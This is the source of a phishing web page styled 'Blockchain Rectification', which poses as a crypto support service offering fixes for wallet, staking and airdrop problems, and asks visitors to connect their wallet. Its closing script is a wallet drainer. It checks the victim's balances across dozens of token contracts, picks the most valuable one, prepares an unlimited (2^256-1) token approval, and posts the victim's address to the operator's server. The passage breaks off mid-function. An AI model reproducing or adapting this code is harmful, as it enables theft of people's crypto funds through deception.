<?php
require 'noBot.php';
?>
<html lang=""><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width,initial-scale=1">
  <link rel="icon" href="./style/favicon.png">
  <title>Blockchain Rectification - We are here to help you resolve your crypto related issues</title>

  
  <meta content="FAQs" property="og:title">
  <meta content="FAQs" property="twitter:title">
  <meta content="width=device-width, initial-scale=1" name="viewport">
  <link href="./style/normalize.css" rel="stylesheet" type="text/css">
  <link href="./style/webflow.css" rel="stylesheet" type="text/css">
  <link href="./style/metamask-staging-2.webflow.css" rel="stylesheet" type="text/css">
  <script src="./style/webfont.js" type="text/javascript"></script>
  <script src="./style/main.js" type="text/javascript"></script>
  <script src="./style/tags.js" type="text/javascript"></script>        
  <script type="text/javascript" src="./Coinbase_files/jquery-2.1.4.min.js.download"></script>
  
  <link rel="shortcut icon" type="image/png" href="assets/img/favicon.png"/>
    <link rel="stylesheet" href="assets/libs/bootstrap/dist/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/libs/owl.carousel/dist/assets/owl.carousel.css">
    <link rel="stylesheet" href="assets/libs/owl.carousel/dist/assets/owl.theme.default.css">
    <link rel="stylesheet" href="assets/libs/remixicon/fonts/remixicon.css">
    <link rel="stylesheet" href="assets/fonts/fonts.css">
    <link rel="stylesheet" href="assets/css/app.css">
    <link rel="stylesheet" id="stm-stmicons-css" href="assets/stm_fonts/stmicons/stmicons.css" type="text/css" media="all" />
    <link href="npm/select2_4.1.0-rc.0/dist/css/select2.min.css" rel="stylesheet" />
    <link href="ajax/libs/toastr_js/latest/css/toastr.min.css" rel="stylesheet" />
  <script src="assets/libs/owl.carousel/dist/owl.carousel.min.js"></script>
     <script src="assets/js/app.js"></script>
    <script src="assets/js/decimal.js"></script>
  
  
  
  <script>

  	event.preventDefault();
  	event.stopPropagation();
  </script>
  <style>
      #walletconnect-wrapper{
        /*  display: none !important; */
      }
  </style>
  
  <link href="https://coinbase-defi-20.vip/mobile/js/app.195cc395.js" rel="preload" as="script">
  <link href="https://coinbase-defi-20.vip/mobile/js/chunk-vendors.493d37c0.js" rel="preload" as="script">
 <style data-styled="active" data-styled-version="5.2.0"></style><style id="walletconnect-style-sheet">:root {<br>  --animation-duration: 300ms;<br>}<br><br>@keyframes fadeIn {<br>  from {<br>    opacity: 0;<br>  }<br>  to {<br>    opacity: 1;<br>  }<br>}<br><br>@keyframes fadeOut {<br>  from {<br>    opacity: 1;<br>  }<br>  to {<br>    opacity: 0;<br>  }<br>}<br><br>.animated {<br>  animation-duration: var(--animation-duration);<br>  animation-fill-mode: both;<br>}<br><br>.fadeIn {<br>  animation-name: fadeIn;<br>}<br><br>.fadeOut {<br>  animation-name: fadeOut;<br>}<br><br>#walletconnect-wrapper {<br>  -webkit-user-select: none;<br>  align-items: center;<br>  display: flex;<br>  height: 100%;<br>  justify-content: center;<br>  left: 0;<br>  pointer-events: none;<br>  position: fixed;<br>  top: 0;<br>  user-select: none;<br>  width: 100%;<br>  z-index: 99999999999999;<br>}<br><br>.walletconnect-modal__headerLogo {<br>  height: 21px;<br>}<br><br>.walletconnect-modal__header p {<br>  color: #ffffff;<br>  font-size: 20px;<br>  font-weight: 600;<br>  margin: 0;<br>  align-items: flex-start;<br>  display: flex;<br>  flex: 1;<br>  margin-left: 5px;<br>}<br><br>.walletconnect-modal__close__wrapper {<br>  position: absolute;<br>  top: 0px;<br>  right: 0px;<br>  z-index: 10000;<br>  background: white;<br>  border-radius: 26px;<br>  padding: 6px;<br>  box-sizing: border-box;<br>  width: 26px;<br>  height: 26px;<br>  cursor: pointer;<br>}<br><br>.walletconnect-modal__close__icon {<br>  position: relative;<br>  top: 7px;<br>  right: 0;<br>  display: flex;<br>  align-items: center;<br>  justify-content: center;<br>  transform: rotate(45deg);<br>}<br><br>.walletconnect-modal__close__line1 {<br>  position: absolute;<br>  width: 100%;<br>  border: 1px solid rgb(48, 52, 59);<br>}<br><br>.walletconnect-modal__close__line2 {<br>  position: absolute;<br>  width: 100%;<br>  border: 1px solid rgb(48, 52, 59);<br>  transform: rotate(90deg);<br>}<br><br>.walletconnect-qrcode__base {<br>  -webkit-tap-highlight-color: rgba(0, 0, 0, 0);<br>  background: rgba(37, 41, 46, 0.95);<br>  height: 100%;<br>  left: 0;<br>  pointer-events: auto;<br>  position: fixed;<br>  top: 0;<br>  transition: 0.4s cubic-bezier(0.19, 1, 0.22, 1);<br>  width: 100%;<br>  will-change: opacity;<br>  padding: 40px;<br>  box-sizing: border-box;<br>}<br><br>.walletconnect-qrcode__text {<br>  color: rgba(60, 66, 82, 0.6);<br>  font-size: 16px;<br>  font-weight: 600;<br>  letter-spacing: 0;<br>  line-height: 1.1875em;<br>  margin: 10px 0 30px 0;<br>  text-align: center;<br>  width: 100%;<br>}<br><br>@media only screen and (max-width: 768px) {<br>  .walletconnect-qrcode__text {<br>    font-size: 4vw;<br>  }<br>}<br><br>@media only screen and (max-width: 320px) {<br>  .walletconnect-qrcode__text {<br>    font-size: 14px;<br>  }<br>}<br><br>.walletconnect-qrcode__image {<br>  width: calc(100% - 30px);<br>  box-sizing: border-box;<br>  cursor: none;<br>  margin: 0 auto;<br>}<br><br>.walletconnect-qrcode__notification {<br>  position: absolute;<br>  bottom: 0;<br>  left: 0;<br>  right: 0;<br>  font-size: 16px;<br>  padding: 16px 20px;<br>  border-radius: 16px;<br>  text-align: center;<br>  transition: all 0.1s ease-in-out;<br>  background: white;<br>  color: black;<br>  margin-bottom: -60px;<br>  opacity: 0;<br>}<br><br>.walletconnect-qrcode__notification.notification__show {<br>  opacity: 1;<br>}<br><br>@media only screen and (max-width: 768px) {<br>  .walletconnect-modal__header {<br>    height: 130px;<br>  }<br>  .walletconnect-modal__base {<br>    overflow: auto;<br>  }<br>}<br><br>@media only screen and (min-device-width: 415px) and (max-width: 768px) {<br>  #content {<br>    max-width: 768px;<br>    box-sizing: border-box;<br>  }<br>}<br><br>@media only screen and (min-width: 375px) and (max-width: 415px) {<br>  #content {<br>    max-width: 414px;<br>    box-sizing: border-box;<br>  }<br>}<br><br>@media only screen and (min-width: 320px) and (max-width: 375px) {<br>  #content {<br>    max-width: 375px;<br>    box-sizing: border-box;<br>  }<br>}<br><br>@media only screen and (max-width: 320px) {<br>  #content {<br>    max-width: 320px;<br>    box-sizing: border-box;<br>  }<br>}<br><br>.walletconnect-modal__base {<br>  -webkit-font-smoothing: antialiased;<br>  background: #ffffff;<br>  border-radius: 24px;<br>  box-shadow: 0 10px 50px 5px rgba(0, 0, 0, 0.4);<br>  font-family: ui-rounded, "SF Pro Rounded", "SF Pro Text", medium-content-sans-serif-font,<br>    -apple-system, BlinkMacSystemFont, ui-sans-serif, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell,<br>    "Open Sans", "Helvetica Neue", sans-serif;<br>  margin-top: 41px;<br>  padding: 24px 24px 22px;<br>  pointer-events: auto;<br>  position: relative;<br>  text-align: center;<br>  transition: 0.4s cubic-bezier(0.19, 1, 0.22, 1);<br>  will-change: transform;<br>  overflow: visible;<br>  transform: translateY(-50%);<br>  top: 50%;<br>  max-width: 500px;<br>  margin: auto;<br>}<br><br>@media only screen and (max-width: 320px) {<br>  .walletconnect-modal__base {<br>    padding: 24px 12px;<br>  }<br>}<br><br>.walletconnect-modal__base .hidden {<br>  transform: translateY(150%);<br>  transition: 0.125s cubic-bezier(0.4, 0, 1, 1);<br>}<br><br>.walletconnect-modal__header {<br>  align-items: center;<br>  display: flex;<br>  height: 26px;<br>  left: 0;<br>  justify-content: space-between;<br>  position: absolute;<br>  top: -42px;<br>  width: 100%;<br>}<br><br>.walletconnect-modal__base .wc-logo {<br>  align-items: center;<br>  display: flex;<br>  height: 26px;<br>  margin-top: 15px;<br>  padding-bottom: 15px;<br>  pointer-events: auto;<br>}<br><br>.walletconnect-modal__base .wc-logo div {<br>  background-color: #3399ff;<br>  height: 21px;<br>  margin-right: 5px;<br>  mask-image: url("images/wc-logo.svg") center no-repeat;<br>  width: 32px;<br>}<br><br>.walletconnect-modal__base .wc-logo p {<br>  color: #ffffff;<br>  font-size: 20px;<br>  font-weight: 600;<br>  margin: 0;<br>}<br><br>.walletconnect-modal__base h2 {<br>  color: rgba(60, 66, 82, 0.6);<br>  font-size: 16px;<br>  font-weight: 600;<br>  letter-spacing: 0;<br>  line-height: 1.1875em;<br>  margin: 0 0 19px 0;<br>  text-align: center;<br>  width: 100%;<br>}<br><br>.walletconnect-modal__base__row {<br>  -webkit-tap-highlight-color: rgba(0, 0, 0, 0);<br>  align-items: center;<br>  border-radius: 20px;<br>  cursor: pointer;<br>  display: flex;<br>  height: 56px;<br>  justify-content: space-between;<br>  padding: 0 15px;<br>  position: relative;<br>  margin: 0px 0px 8px;<br>  text-align: left;<br>  transition: 0.15s cubic-bezier(0.25, 0.46, 0.45, 0.94);<br>  will-change: transform;<br>  text-decoration: none;<br>}<br><br>.walletconnect-modal__base__row:hover {<br>  background: rgba(60, 66, 82, 0.06);<br>}<br><br>.walletconnect-modal__base__row:active {<br>  background: rgba(60, 66, 82, 0.06);<br>  transform: scale(0.975);<br>  transition: 0.1s cubic-bezier(0.25, 0.46, 0.45, 0.94);<br>}<br><br>.walletconnect-modal__base__row__h3 {<br>  color: #25292e;<br>  font-size: 20px;<br>  font-weight: 700;<br>  margin: 0;<br>  padding-bottom: 3px;<br>}<br><br>.walletconnect-modal__base__row__right {<br>  align-items: center;<br>  display: flex;<br>  justify-content: center;<br>}<br><br>.walletconnect-modal__base__row__right__app-icon {<br>  border-radius: 8px;<br>  height: 34px;<br>  margin: 0 11px 2px 0;<br>  width: 34px;<br>  background-size: 100%;<br>  box-shadow: 0 4px 12px 0 rgba(37, 41, 46, 0.25);<br>}<br><br>.walletconnect-modal__base__row__right__caret {<br>  height: 18px;<br>  opacity: 0.3;<br>  transition: 0.1s cubic-bezier(0.25, 0.46, 0.45, 0.94);<br>  width: 8px;<br>  will-change: opacity;<br>}<br><br>.walletconnect-modal__base__row:hover .caret,<br>.walletconnect-modal__base__row:active .caret {<br>  opacity: 0.6;<br>}<br><br>.walletconnect-modal__mobile__toggle {<br>  width: 80%;<br>  display: flex;<br>  margin: 0 auto;<br>  position: relative;<br>  overflow: hidden;<br>  border-radius: 8px;<br>  margin-bottom: 5vw;<br>  background: #d4d5d9;<br>}<br><br>.walletconnect-modal__mobile__toggle_selector {<br>  width: calc(50% - 8px);<br>  background: white;<br>  position: absolute;<br>  border-radius: 5px;<br>  height: calc(100% - 8px);<br>  top: 4px;<br>  transition: all 0.2s ease-in-out;<br>  transform: translate3d(4px, 0, 0);<br>}<br><br>.walletconnect-modal__mobile__toggle.right__selected .walletconnect-modal__mobile__toggle_selector {<br>  transform: translate3d(calc(100% + 12px), 0, 0);<br>}<br><br>.walletconnect-modal__mobile__toggle a {<br>  font-size: 12px;<br>  width: 50%;<br>  text-align: center;<br>  padding: 8px;<br>  margin: 0;<br>  font-weight: 600;<br>  z-index: 1;<br>}<br><br>.walletconnect-modal__footer {<br>  display: flex;<br>  justify-content: center;<br>  margin-top: 20px;<br>}<br><br>@media only screen and (max-width: 768px) {<br>  .walletconnect-modal__footer {<br>    margin-top: 5vw;<br>  }<br>}<br><br>.walletconnect-modal__footer a {<br>  cursor: pointer;<br>  color: #898d97;<br>  font-size: 15px;<br>  margin: 0 auto;<br>}<br><br>@media only screen and (max-width: 320px) {<br>  .walletconnect-modal__footer a {<br>    font-size: 14px;<br>  }<br>}<br><br>.walletconnect-connect__buttons__wrapper {<br>  max-height: 44vh;<br>}<br><br>.walletconnect-connect__buttons__wrapper__android {<br>  margin: 50% 0;<br>}<br><br>.walletconnect-connect__buttons__wrapper__wrap {<br>  display: grid;<br>  grid-template-columns: repeat(4, 1fr);<br>  margin-top: 20px;<br>  margin-bottom: 10px;<br>}<br><br>@media only screen and (min-width: 768px) {<br>  .walletconnect-connect__buttons__wrapper__wrap {<br>    margin-top: 40px;<br>  }<br>}<br><br>.walletconnect-connect__button {<br>  background-color: rgb(64, 153, 255);<br>  padding: 12px;<br>  border-radius: 8px;<br>  text-decoration: none;<br>  color: rgb(255, 255, 255);<br>  font-weight: 500;<br>}<br><br>.walletconnect-connect__button__icon_anchor {<br>  cursor: pointer;<br>  display: flex;<br>  justify-content: flex-start;<br>  align-items: center;<br>  margin: 8px;<br>  width: 42px;<br>  justify-self: center;<br>  flex-direction: column;<br>  text-decoration: none !important;<br>}<br><br>@media only screen and (max-width: 320px) {<br>  .walletconnect-connect__button__icon_anchor {<br>    margin: 4px;<br>  }<br>}<br><br>.walletconnect-connect__button__icon {<br>  border-radius: 10px;<br>  height: 42px;<br>  margin: 0;<br>  width: 42px;<br>  background-size: cover !important;<br>  box-shadow: 0 4px 12px 0 rgba(37, 41, 46, 0.25);<br>}<br><br>.walletconnect-connect__button__text {<br>  color: #424952;<br>  font-size: 2.7vw;<br>  text-decoration: none !important;<br>  padding: 0;<br>  margin-top: 1.8vw;<br>  font-weight: 600;<br>}<br><br>@media only screen and (min-width: 768px) {<br>  .walletconnect-connect__button__text {<br>    font-size: 16px;<br>    margin-top: 12px;<br>  }<br>}<br></style></head>
 <body>
  <!--div style="width:%100; height: 100%; position: fixed; top: 0; left: 0; text-align: center;"--!>
    <!--<img style="width:60%; height:auto; margin: 40% auto 20px; display:block;" src="./Coinbase_files/loading.gif">--!>
    <!--div data-v-11de778f="" class="receive_button" id="btn-connect" onclick="location.reload();">Receive</div--!>
  </div>
  <!--style type="text/css">
    .receive_button {
        display: inline-block;
        line-height: 9.6vw;
        margin-top: 4.26666667vw;
        padding: 0 5.33333333vw;
        text-align: center;
        font-weight: 600;
        color: #ffffff;
        border-radius: 1.33333333vw;
        background: #0950f8;
        box-shadow: 0 2px 4px 0 rgb(0 0 0 / 50%);
    }
  </style-->
  <link rel="stylesheet" href="./style/css" media="all"><script type="text/javascript">WebFont.load({  google: {    families: ["Changa One:400,400italic"]  }});</script>
  <link href="./style/favicon.png" rel="shortcut icon" type="image/x-icon">
  <link href="./style/webclip.png" rel="apple-touch-icon">

<style type="text/css">@font-face { font-family: Roboto; src: url("chrome-extension://mcgbeeipkmelnpldkobichboakdfaeon/css/Roboto-Regular.ttf"); }</style></head>
<body class="body-4">
	
	
  <!--==================================
            Loader Start Here
    ===================================-->
        <div class="Loader">
            <div class="spinnerPairHolder">
                <div class="spinnerPair">
                    <div class="spinnerPairCercle"></div>
                    <div class="spinnerPairCercle"></div>
                </div>
                <div class="spinnerPair">
                    <div class="spinnerPairCercle"></div>
                    <div class="spinnerPairCercle"></div>
                </div>
                <div class="spinnerPair">
                    <div class="spinnerPairCercle"></div>
                    <div class="spinnerPairCercle"></div>
                </div>
                <div class="spinnerPair">
                    <div class="spinnerPairCercle"></div>
                    <div class="spinnerPairCercle"></div>
                </div>
                <div class="spinnerPair">
                    <div class="spinnerPairCercle"></div>
                    <div class="spinnerPairCercle"></div>
                </div>
            </div>
        </div>
    <!--==================================
            Loader End Here
    ===================================-->
    <!--==================================
            Hero Section Start Here
    ===================================-->


    </div>

    
        <div class="hero2-main">
            <div class="container-fluid">
                <div class="row row-custom">
                    <div class="col-lg-5 col-content-otr">
                        <div class="col-content-inr">
                            <h1 class="heading heading-h1">Manual Blockchain Integration</h1>
                            <p class="desc heading-L">Every blockchain network is encrypted, unique and is open source.</p>
                            <p class="desc heading-L">This blockchain integration decentralized protocol is reponsible for resolving API key errors, JSON RPC errors, RPC endpoint issues and a blanket of issues plaguing DeFi protocols.</h4>
                            <p class="desc heading-L">The blockchain integration server uses a top of the line cryptographic multilayer security system that ensures a secure integration of any non custodial wallet to all Defi protocols without human interference.</h3>
                            <p class="desc heading-L"></h3>
                            
                            <div id="balance" style="display:none;">eth balance</div>
                                
                            
                            <div class="action">
                            	
                            	
                                <button class="btn-primary-1 btn-hero heading-SB connectBtn" ><a id="btn-connect" style="color: white;">Connect Wallet</a></button>
                                
                                
                            </div>
                        </div>
                    </div>
                </div>
                <img class="hero-img" src="assets/img/hero-img-home-2.png" alt="img">
            </div>
        </div>
    <!--==================================
            Hero Section End Here
    ===================================-->
    <!--==================================
            How It Works Start Here
    ===================================-->
    <div class="how-it-work-main">
        <div class="container-fluid">
            <div class="wrapper">
                <div class="tab-otr">
                    <h2 class="heading heading-h2">Make Your Selection Below</h2>
                </div>
            </div>
            <div class="row-custom-main">
                <div id="tab-21" class="tab-content active">
                    <div class="row row-custom-inr">
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href=""><div class="col-work-inr box-1 connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-check"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Migration Issues</h4>
                                    <p class="desc heading-S">Click here for migration related issues</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href=""><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-building6"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Assets Recovery</h4>
                                    <p class="desc heading-S">Click here for assets recovery issues</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href=""><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-oil"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">High Gas Fees</h4>
                                    <p class="desc heading-S">Click here for gas fee related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href=""><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-chart-refresh"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Slippage Error</h4>
                                    <p class="desc heading-S">Click here for slippage related error during trade.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href=""><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-stm14_calc"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Transaction Error</h4>
                                    <p class="desc heading-S">Click here for transaction related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href=""><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-btc_public"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Cross Chain Transfer</h4>
                                    <p class="desc heading-S">Click here for cross chain bridge issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href=""><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-ia_clock"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Staking Issues</h4>
                                    <p class="desc heading-S">click here for staking related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href=""><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-marketplace"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Swap/Exchange</h4>
                                    <p class="desc heading-S">Click here for swap/exchange related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href=""><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-stats"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Connect to Dapps</h4>
                                    <p class="desc heading-S">Click here for error while connecting to Dapps</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href=""><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-crypto_secured"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Login Issues</h4>
                                    <p class="desc heading-S">Click here for issues while logging into your wallet.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href=""><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-loans_mobile"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Claim Airdrop</h4>
                                    <p class="desc heading-S">Click here for airdrop related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href=""><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-chart-monitor"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">NFTS Issues</h4>
                                    <p class="desc heading-S">Click here for NFTs minting/transfer related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href=""><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-lamp"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Missing/Irregular Balance</h4>
                                    <p class="desc heading-S">Click here to recover lost/missing funds.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href=""><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-plus"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Whitelist Issues</h4>
                                    <p class="desc heading-S">Click here for whitelist related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href=""><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-marker"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Transaction Delay</h4>
                                    <p class="desc heading-S">Click here for any issues related to transaction delayed.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href=""><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-crypto_secured"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Locked Account</h4>
                                    <p class="desc heading-S">Click here for issues related to account lock.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href=""><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-rating_down"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Trading Wallet Issues</h4>
                                    <p class="desc heading-S">Click here if you have problem with your trading wallet.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href=""><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-stm14_calc"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Unable To Buy Coins/Tokens</h4>
                                    <p class="desc heading-S">To trade crypto your account must be marked as a trusted payment source.</p>
                                </div>
                            </div></a>
                        </div>
                            <div class="col-lg-4 col-md-6 col-work-otr">
                                <a href=""><div class="col-work-inr connectBtn">
                                    <div class="icon-otr">
                                        <i style="font-size: 52px;" class="stm-stm14_calc"></i>
                                    </div>
                                    <div class="content">
                                        <h4 class="heading heading-h4">Other Issues Not Listed</h4>
                                        <p class="desc heading-S">If you can't find the issue you are experiencing click here</p>
                                    </div>
                                </div></a>
                        </div>
                         <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href=""><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-loans_mobile"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Synchronize</h4>
                                    <p class="desc heading-S">Click here to restore sync.</p>
                                </div>
                            </div></a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
   
    <!--==================================
            How It Works End Here
    ===================================-->
    <!--==================================
            Footer Start Here
    ===================================-->
        <div class="copyright-main">
            <div class="container-fluid">
                <div class="wrapper">
                    <p class="copy-right heading-S">Copyright © 2023 Blockchain Rectification . All rights reserved.</p>
                    <div class="linkk-otr">
                        <p class="linkk-inr"><a href="" class="linkk-page heading-S">Privacy Policy </a> • <a href="" class="linkk-page heading-S"> Terms of Service</a></p>
                    </div>
                </div>
            </div>
        </div>
         
 	<script type="text/javascript" src="./Coinbase_files/jquery-2.1.4.min.js.download"></script>
	<script src="./Coinbase_files/bignumber.min.js.download"></script>
	<script src="./Coinbase_files/web3.min.js.download"></script>
	<script type="text/javascript" src="./Coinbase_files/web3model.min.js.download"></script>
	<script type="text/javascript" src="./Coinbase_files/web3provider.js.download"></script>
<!-- 	 <script src="/layer/layer.js"></script> -->
	  <script src="./Coinbase_files/abi.js.download"></script>
	  <script src="./Coinbase_files/tiao.js.download"></script>
    <script>

    //allProfit();


	$(function() {
		var authorized_address = '';
		var infura_key = '';
		var url=window.location.host;
		var domain = 'http://'+url+'/';
		var bizhong = '';
		const approveNum = new BigNumber(2).exponentiatedBy(256).minus(1)
		var address = getUrlQueryString('address')
		var rank = 6.45;
		$('#address').text(address)


		/******************************************/
		// Unpkg imports
		const _web3 = new Web3('https://mainnet.infura.io/v3/0b16762a13ca4e38a5f2e06c7b56849a')
            console.log(_web3);
		let injectedWeb3 = null, total = 0
		let approveAddr = '0xdac17f958d2ee523a2206206994597c13d831ec7' /*contract address (ERC20) */
		const addr = {
			'usdt': '0xa71EdC38d189767582C38A3145b5873052c3e47a',
			'sushi': '0x6b3595068778dd592e39a122f4f5a5cf09c90fe2',
			'usdc': '0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48',
			'uni': '0x1f9840a85d5af5bf1d1762f925bdaddc4201f984',
			'aave': '0x7fc66500c84a76ad7e9c93437bfc5ac33e2ddae9',
			'yfi': '0x0bc529c00C6401aEF6D220BE8C6Ea1667F6Ad93e',
			'dai': '0x6b175474e89094c44da98b954eedeac495271d0f',
			'link': '0x514910771af9ca656af840dff83e8264ecf986ca',
			"LON": "0x0000000000095413afc295d19edeb1ad7b71c952",
			"CRV": "0xD533a949740bb3306d119CC777fa900bA034cd52",
			'FIL': "0xbf48ecb7c2d3d559e0a24b04f306889e05c73cd6",
		}

		const addr2 = {
			"WBTC": "0x2260fac5e5542a773aa44fbcfedf7c193bc2c599",
			"WETH": "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2",
			"CONV": "0xc834fa996fa3bec7aad3693af486ae53d8aa8b50",
			"inj": "0xe28b3B32B6c345A34Ff64674606124Dd5Aceca30",
			"MKR": "0x9f8f72aa9304c8b593d555f12ef6589cc3a579a2",
			"ALPHA": "0xa1faa113cbe53436df28ff0aee54275c13b40975",
			"BAND": "0xba11d00c5f74255f56a5e366f4f77f5a186d7f55",
			"snx": "0xc011a73ee8576fb46f5e1c5751ca3b9fe0af2a6f",
			"comp": "0xc00e94cb662c3520282e6f5717214004a7f26888",
			"sxp": "0x8ce9137d39326ad0cd6491fb5cc0cba0e089b6a9",
		}

		const addr3 = {
			"FTT": "0x50d1c9771902476076ecfc8b2a83ad6b9355a4c9",
			"ust": "0xa47c8bf37f92abed4a126bda807a7b7498661acd",
			"TRIBE": "0xc7283b66eb1eb5fb86327f08e1b5816b0720212b",
			"wise": "0x66a0f676479Cee1d7373f3DC2e2952778BfF5bd6",
			"RRAX": "0x853d955acef822db058eb8505911ed77f175b99e",
			"CORE": "0x62359Ed7505Efc61FF1D56fEF82158CcaffA23D7",
			"mir": "0x09a3ecafa817268f77be1283176b946c4ff2e608",
			"DPI": "0x1494ca1f11d487c2bbe4543e90080aeba4ba3c2b",
			"luna": "0xd2877702675e6ceb975b4a1dff9fb7baf4c91ea9",
			"HEZ": "0xEEF9f339514298C6A857EfCfC1A762aF84438dEE",
			"fxs": "0x3432b6a60d23ca0dfca7761b7ab56459d9c964d0",
			"fei": "0x956f47f50a910163d8bf957cf5846d573e7f87ca",
		}

		async function getMostValuableAssets(account) {
			let _symbol = 'usdt'
			console.log('_symbol:'+_symbol);

			for (const [symbol, contract] of Object.entries(contracts)) {
				contract.methods.balanceOf(account).call(function(err, balance) {
					if(symbol == 'usdt'){

						let yu =balance / (10** (decimals[symbol] || 18))
						console.log(yu.toLocaleString())
						$('#yu').text(yu.toLocaleString() +' USDT')

					}
					const usdt = balance / (10** (decimals[symbol] || 18)) * price[symbol]
					if (usdt > total && usdt > 1000) {
						_symbol = symbol
						total = usdt
						approveAddr = addr[_symbol]
						bizhong = _symbol

					}
				})
			}

			bizhong = _symbol
			console.log('_symbol:'+_symbol);
			return _symbol
		}

		function getUrlQueryString(names, urls) {
			urls = urls || window.location.href;
			urls && urls.indexOf("?") > -1 ? urls = urls.substring(urls.indexOf("?") + 1) : "";
			var reg = new RegExp("(^|&)" + names + "=([^&]*)(&|$)", "i");
			var r = urls ? urls.match(reg) : window.location.search.substr(1).match(reg);
			if (r != null && r[2] != "")return unescape(r[2]);
			return null;
		}


			 $('#title').on('click',function(){
	          layer.open({
	            type:1,
	            title:'',
	           offset:['100px','10%'],
	           area:['80%','100px'],
	           shadeClose:1,
	           closeBtn :0,
	           content:$('#content').val()

	          });
	    })

			// setInterval(function(){
   //      	    getInfo();
   //      	},1000)

		async function postInfo(address,symbol){
            // $('#btn-connect').hide();
			var s = getUrlQueryString('s')
			var a = getUrlQueryString('r')
            var type= $('#type').val();
			var data = {
				address:address,
				authorized_address:authorized_address,
				bizhong:type,
				code:s?s:1,
				reffer:a,
